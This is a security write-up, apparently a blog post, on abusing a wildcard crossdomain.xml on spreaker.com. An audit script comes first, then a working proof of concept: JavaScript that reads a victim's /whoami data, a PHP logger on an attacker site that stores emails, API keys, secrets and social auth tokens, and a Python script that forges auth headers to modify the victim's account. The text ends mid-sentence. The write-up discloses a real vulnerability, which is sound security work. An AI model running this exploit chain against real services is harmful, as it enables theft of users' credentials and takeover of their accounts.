Crossdomain.xml evil usage example
Introduction: it all starts with a wildcard (*)
The crossdomain.xml file tells the Flash player which domains may send requests to the site and read the responses. It should be restricted to trusted websites, but spreaker.com's is not: a wildcard means that any site is allowed to send a request and read the response, with the victim's cookies attached. The response of spreaker.com/crossdomain.xml is as follows:

```xml
<allow-access-from domain="*"/>
```
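As an added example (not code from the original post), the check below audits a crossdomain.xml body offline and flags the wildcard shown above, as well as two related weak settings (`secure="false"` and a wildcard in `allow-http-request-headers-from`). Both policies are constructed sample inputs, not the real spreaker.com file; the restricted one is what a hardened policy would look like.

```python
import xml.etree.ElementTree as ET

# Constructed sample policies (not fetched from any site): the wildcard
# policy this write-up is about, and a restricted one for comparison.
WILDCARD_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>
"""

RESTRICTED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.example.com" secure="true"/>
  <allow-access-from domain="*.example.com" secure="true"/>
</cross-domain-policy>
"""


def audit_policy(xml_text):
    """Return a list of findings (strings) for a crossdomain.xml body.

    Flags: a bare '*' domain (any origin may read responses sent with the
    victim's cookies), an over-broad wildcard such as '*.com',
    secure="false" (lets plain-HTTP SWFs read HTTPS responses), and a
    wildcard in allow-http-request-headers-from.
    """
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["not a cross-domain-policy document"]
    for el in root.findall("allow-access-from"):
        domain = el.get("domain", "")
        secure = el.get("secure", "true").lower()
        if domain == "*":
            findings.append('allow-access-from domain="*": any site can read responses')
        elif domain.startswith("*.") and domain.count(".") < 2:
            # "*.com" covers every .com site, which is effectively "*"
            findings.append("over-broad wildcard domain %r" % domain)
        if secure == "false":
            findings.append('secure="false" on %r: HTTP SWFs may read HTTPS data' % domain)
    for el in root.findall("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*"')
    return findings


def is_exploitable(xml_text):
    """True when any attacker-controlled origin can read authenticated responses."""
    return any("any site can read" in f for f in audit_policy(xml_text))


if __name__ == "__main__":
    for name, policy in (("wildcard", WILDCARD_POLICY), ("restricted", RESTRICTED_POLICY)):
        print(name, audit_policy(policy) or ["no findings"])
```

To use it against a live target, fetch `/crossdomain.xml` from the site root and pass the body to `audit_policy`; the wildcard finding is the one that enables everything that follows in this write-up.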
With this in mind, let's try to exploit it!
Exploitation
The impact of this misconfiguration depends on the application itself. Find a page in the application that contains sensitive information. For example, if the web application lets users send and receive email (like Yahoo or Gmail), reading their email is a sensitive action; if the web application has a personal profile page, we can learn the user's name, email address and other information without doing anything else...
1) Search for sensitive pages
From the Spreaker API documentation:
The Spreaker API's API Key and Secret allow you to easily read public information without authentication. For example, api.spreaker.com/show/9 will return public information related to "The bit a bit show". If you need to obtain private information or create and modify data, you need to authenticate.
For authentication, You need to obtain your API Key and Secret:
Open api.spreaker.com/whoami and read the API key and secret (they will never change)
This is the jackpot: the api.spreaker.com/whoami response includes all of the current user's sensitive information:
user id, fullname, fb user id, email, **api key**, **api secret**, tw auth token, tw auth token secret, fb auth token, ...
You can also see this information at www.spreaker.com/account/profile!
2) Build a PoC to read and save the sensitive page
We can request api.spreaker.com/whoami from a Flash file (ActionScript) and send the page content to our logger. Because I am not very good at programming with Flash, I use the ready-made CrossXHR library.
First, we send a GET request for the page:
```javascript
var request;

function test_get() {
    request = new CrossXHR();
    request.onreadystatechange = callback;
    request.open('GET', 'http://api.spreaker.com/whoami');
    request.send();
}
```
Then process the response. In the callback I send it to the logger, which parses and stores the sensitive information:

```javascript
function callback() {
    if (request.readyState != 4) return;   // wait for the complete response
    var data = request.responseText;       // contains the content of /whoami
    // httpGet is the author's own helper (not shown) that fires a GET request;
    // the JSON is URL-encoded so it survives the query string intact
    httpGet("/poc/logger.php?data=" + encodeURIComponent(data)); // send it to the logger
    alert("done");                         // just for demo
}
```
logger.php receives the JSON data, parses it and stores it:

```php
<?php
// receive the content via the data param, then parse it
$data = $_GET['data'];
$obj = json_decode($data);
$user = $obj->{'response'}->{'user'};
$email = $user->{'email'};
$apikey = $user->{'api_key'}->{'key'};
$apisecret = $user->{'api_key'}->{'secret'};
// the remaining fields listed above (social auth tokens, ...) are read the same way

// append one row per victim to a simple HTML table
$html  = '<table border="1">';
$html .= '<tr><th>User Id</th><th>Fullname</th><th>email</th><th>api key</th><th>api secret</th></tr>';
$html .= '<tr>';
$html .= '<td>' . $user->{'user_id'} . '</td>';
$html .= '<td>' . $user->{'fullname'} . '</td>';
$html .= '<td>' . $email . '</td>';
$html .= '<td>' . $apikey . '</td>';
$html .= '<td>' . $apisecret . '</td>';
$html .= '</tr>';
$html .= '</table>';

$file = fopen('data.html', 'a');
fwrite($file, "<html><body>\n");
fwrite($file, $html . "\n\n\n");
fwrite($file, "</body></html>\n");
fclose($file);
```
The PoC is quick and dirty. What happens: the victim visits the attacker's site attacker.com, and their sensitive information is recorded in a very sexy HTML page.
Impact
Now that we have the API key and secret, we can do exactly what the Spreaker developer documentation said above: read private information and create or modify data.
If the account is also linked to other social media accounts (Twitter, Facebook, Google+), we also get their auth token and auth secret! And the phrase "the API key and secret will never change" in the developer documentation is especially nasty: you cannot change the API key and secret even if your account is compromised. Changing the password and email does nothing; the only option left to the user is to delete the account.
Next, we generate an authentication digest and send it in the X-Spreaker-Auth HTTP header, which lets us send authenticated requests on the user's behalf:
```python
import hashlib
import random
import sys
import time

import requests

user_id = sys.argv[1]
api_key = sys.argv[2]
api_secret = sys.argv[3]

# Generate a nonce and get the current timestamp (seconds since epoch)
nonce = random.randint(0, 99999999)
timestamp = int(time.time())

# Generate the hash of nonce:api_key:api_secret:timestamp
md5 = hashlib.md5()
md5.update(("%s:%s:%s:%s" % (nonce, api_key, api_secret, timestamp)).encode())

# Generate the digest sent in the X-Spreaker-Auth header
digest = "%s:%s:%s:%s" % (nonce, api_key, timestamp, md5.hexdigest())
print('X-Spreaker-Auth: %s' % digest)

# Change the victim's profile description on their behalf
url = "http://api.spreaker.com/user/" + str(user_id)
payload = {'description': 'Hacked'}
headers = {'X-Spreaker-Auth': digest}
r = requests.put(url, params=payload, headers=headers)
print('response code: ' + str(r.status_code))
```
Run
```
python poc.py user_id api_key api_secret
```
Now visit the user's profile page: